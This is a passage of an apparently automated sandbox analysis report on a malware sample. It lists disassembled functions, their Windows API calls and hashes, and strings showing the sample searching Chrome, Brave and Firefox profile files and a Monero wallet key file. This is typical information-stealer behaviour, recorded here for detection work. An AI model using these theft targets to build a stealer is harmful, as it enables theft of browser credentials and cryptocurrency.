                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: 7db0857ceb1c53666d7675ed3186614f1683e23fd6b07bb965de1ef9f5f4fc5a
                              • Instruction ID: 928744e46e6e00fdcf3b4c9f480dbcd7202f247b82a19801fe494e8d7ad0899c
                              • Opcode Fuzzy Hash: 7db0857ceb1c53666d7675ed3186614f1683e23fd6b07bb965de1ef9f5f4fc5a
                              • Instruction Fuzzy Hash: E8427772900104ABDB14FBB0DD96EED737DAF64300F808598F946A7191EF34AB49CB92
                              Function 00134910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 0013492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 00134943
                              • StrCmpCA.SHLWAPI(?,00140FDC), ref: 00134971
                              • StrCmpCA.SHLWAPI(?,00140FE0), ref: 00134987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00134B7D
                              • FindClose.KERNEL32(000000FF), ref: 00134B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: 8e1891053150488f9f59d2b6b151f77e9d6496c88811c03d688b1f5f922e3716
                              • Instruction ID: 6a1acb3193fe363f59e667c22384f1073bab745da45a41f32e2b8a2a2acef5c6
                              • Opcode Fuzzy Hash: 8e1891053150488f9f59d2b6b151f77e9d6496c88811c03d688b1f5f922e3716
                              • Instruction Fuzzy Hash: 386188B1900618ABCB25EBA0DC49FEA737CBF58701F048598F609A6041EB75EB85CF91
                              Function 00134570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00134580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00134587
                              • wsprintfA.USER32 ref: 001345A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 001345BD
                              • StrCmpCA.SHLWAPI(?,00140FC4), ref: 001345EB
                              • StrCmpCA.SHLWAPI(?,00140FC8), ref: 00134601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0013468B
                              • FindClose.KERNEL32(000000FF), ref: 001346A0
                              • lstrcat.KERNEL32(?,00FFE868), ref: 001346C5
                              • lstrcat.KERNEL32(?,00FFD880), ref: 001346D8
                              • lstrlen.KERNEL32(?), ref: 001346E5
                              • lstrlen.KERNEL32(?), ref: 001346F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: 095256b7e19e3a4bfad6a3df4b272ae402761152ee7e987a224eb7b56ccbe972
                              • Instruction ID: 54bff528d3786076b9e6c93a2a4b44f8329e94ccd5e1a1f040b601dfaf7d9ed5
                              • Opcode Fuzzy Hash: 095256b7e19e3a4bfad6a3df4b272ae402761152ee7e987a224eb7b56ccbe972
                              • Instruction Fuzzy Hash: 255168B1940218ABC725EBB0DC89FED777CAF58700F408598F649A6150EBB5EB84CF91
                              Function 00133EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 00133EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 00133EDA
                              • StrCmpCA.SHLWAPI(?,00140FAC), ref: 00133F08
                              • StrCmpCA.SHLWAPI(?,00140FB0), ref: 00133F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0013406C
                              • FindClose.KERNEL32(000000FF), ref: 00134081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: 0cc61c1fa4f8dc490fdaf50a1dc73257f5e0c92d7da3c414bd3a2241841ac165
                              • Instruction ID: 9a656457444c6cf59f0a24a8edba30dfeee65ca1849274c0e6971a50f52af09d
                              • Opcode Fuzzy Hash: 0cc61c1fa4f8dc490fdaf50a1dc73257f5e0c92d7da3c414bd3a2241841ac165
                              • Instruction Fuzzy Hash: 3E5158B1900618ABCB25EBB0DC85EEE777CBF58300F408598F659A6040DB75EB898F95
                              Function 004F2854 Relevance: 17.9, Strings: 13, Instructions: 1627COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: .XE$5zW$D,Gl$Eu{$M7N|$OEqQ$r7{I$ry/$r_{$v_{${#?$A?n$Z_|
                              • API String ID: 0-4083549949
                              • Opcode ID: a4b2c570ac56619f621610e656859958b8755b09778df0504e8f589b6bdb6a0f
                              • Instruction ID: f042dfa19cd50f90d73b68100e8f94fa5d15259f0f6afdd2ed7779561e1d2f05
                              • Opcode Fuzzy Hash: a4b2c570ac56619f621610e656859958b8755b09778df0504e8f589b6bdb6a0f
                              • Instruction Fuzzy Hash: 02B25AF360C2009FE7046E2DEC8567AFBE9EF94720F1A493DEAC5C7744E63598018696
                              Function 0012ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 0012ED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 0012ED55
                              • StrCmpCA.SHLWAPI(?,00141538), ref: 0012EDAB
                              • StrCmpCA.SHLWAPI(?,0014153C), ref: 0012EDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0012F2AE
                              • FindClose.KERNEL32(000000FF), ref: 0012F2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: 4e991fb9d7cb8ecb84ecda396d685f8c2a8bdfb6343e2061de4ee05e619bf728
                              • Instruction ID: 0c755d3cdbcd01474f96067fbf73e68398c3b864aa3d26edc6b57a991c505b2f
                              • Opcode Fuzzy Hash: 4e991fb9d7cb8ecb84ecda396d685f8c2a8bdfb6343e2061de4ee05e619bf728
                              • Instruction Fuzzy Hash: FCE1F972911118AAEB55FB60DC92EEE737CAF64301FC041E9B54A62052EF306F8ACF51
                              Function 0012F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                                • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001415B8,00140D96), ref: 0012F71E
                              • StrCmpCA.SHLWAPI(?,001415BC), ref: 0012F76F
                              • StrCmpCA.SHLWAPI(?,001415C0), ref: 0012F785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0012FAB1
                              • FindClose.KERNEL32(000000FF), ref: 0012FAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: fdffca95fcc872e98ea317a2106fd6f75e22508976224f70d7315c7ab44b4455
                              • Instruction ID: 91902ecfac88d648823cf530de2a2355e00c3cc8281de47cf274bb32c6cd512b
                              • Opcode Fuzzy Hash: fdffca95fcc872e98ea317a2106fd6f75e22508976224f70d7315c7ab44b4455
                              • Instruction Fuzzy Hash: FAB14871900118ABDB24FF64DC96FEE7379AF64300F8085A8E54A97151EF316B4ACF92
                              Function 001216D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0014510C,?,?,?,001451B4,?,?,00000000,?,00000000), ref: 00121923
                              • StrCmpCA.SHLWAPI(?,0014525C), ref: 00121973
                              • StrCmpCA.SHLWAPI(?,00145304), ref: 00121989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00121D40
                              • DeleteFileA.KERNEL32(00000000), ref: 00121DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00121E20
                              • FindClose.KERNEL32(000000FF), ref: 00121E32
                                • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                                • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: f99f5d75bcf01a5b673af3c47d09863759ee2591229ffe56290b3f44f6aca489
                              • Instruction ID: 2f0e767cc9f86c84e1b222a25e97250bd4517097d7dad12500ab88bb0089b571
                              • Opcode Fuzzy Hash: f99f5d75bcf01a5b673af3c47d09863759ee2591229ffe56290b3f44f6aca489
                              • Instruction Fuzzy Hash: 27121071950118ABDB19FB60DC96EEE7378AF74301F8141E9B14A62091EF706F89CFA1
                              Function 0012DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00140C2E), ref: 0012DE5E
                              • StrCmpCA.SHLWAPI(?,001414C8), ref: 0012DEAE
                              • StrCmpCA.SHLWAPI(?,001414CC), ref: 0012DEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0012E3E0
                              • FindClose.KERNEL32(000000FF), ref: 0012E3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: bb9cfa99bb3e17077b6ab67fad72301c72a9bd22d1af2852b9f83ef7523fe9be
                              • Instruction ID: b32ca8458387420d4cc31cc530dfa228a954b56b575e4219828453951cda403f
                              • Opcode Fuzzy Hash: bb9cfa99bb3e17077b6ab67fad72301c72a9bd22d1af2852b9f83ef7523fe9be
                              • Instruction Fuzzy Hash: 2AF1AF71854118AADB15FB60DCA5EEE7378BF24301FC141D9B54A62091EF706F8ACF62
                              Function 0012DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                                • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001414B0,00140C2A), ref: 0012DAEB
                              • StrCmpCA.SHLWAPI(?,001414B4), ref: 0012DB33
                              • StrCmpCA.SHLWAPI(?,001414B8), ref: 0012DB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0012DDCC
                              • FindClose.KERNEL32(000000FF), ref: 0012DDDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: b41aacde2af924a0ed5d39114e4f0946139b15bf42bb94082186b02887cf05fb
                              • Instruction ID: 8992821018a3c80e0ae30d42c94bca7545e70e0d308c11058202c5ab4baf2c5d
                              • Opcode Fuzzy Hash: b41aacde2af924a0ed5d39114e4f0946139b15bf42bb94082186b02887cf05fb
                              • Instruction Fuzzy Hash: A0916972900114A7DB14FBB0FC96DED737DAFA4300F808558F94A96181EF349B59CB92
                              Function 004EF124 Relevance: 12.9, Strings: 9, Instructions: 1676COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
